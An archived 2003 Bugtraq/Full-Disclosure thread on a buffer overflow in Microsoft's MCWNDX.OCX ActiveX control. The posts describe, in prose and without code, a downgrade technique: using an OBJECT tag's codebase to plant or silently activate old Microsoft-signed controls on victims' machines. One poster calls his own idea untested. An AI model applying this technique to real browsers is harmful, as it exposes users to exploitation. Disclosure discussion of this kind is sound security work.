Home page logo

bugtraq logo Bugtraq mailing list archives

RE: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer overflow
From: "Jason Coombs" <jasonc () science org>
Date: Wed, 13 Aug 2003 09:36:25 -1000

What about pointing the OBJECT tag codebase to a known, or probable, location
on the victim's own hard drive?

ActiveX never implemented any type of "same origin policy" the way JavaScript
does, so a local codebase reference should work as a technique to silently
activate any Microsoft-signed ActiveX control.

But I could be mistaken, this is commentary from memory not experimental

I'd much rather spend my time conducting security audits of Linux and trying
to help those companies threatened by SCO's copyright claims defend themselves
in court.

Jason Coombs
jasonc () science org

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com]On Behalf Of Thor Larholm
Sent: Wednesday, August 13, 2003 8:22 AM
To: Tri Huynh; bugtraq () securityfocus com
Cc: full-disclosure () lists netsys com
Subject: Re: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer

The MCWNDX.OCX binary is digitally signed by Microsoft, and as such you can
plant it on the users machine just by pointing the codebase attribute of your
OBJECT tag to an archived copy of the file on your own server.

This also applies to other outdated ActiveX controls, even when a newer
(patched)  version exists and is installed on the users machine you can still
re-introduce the old, buggy version since it is digitally signed by Microsoft.

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]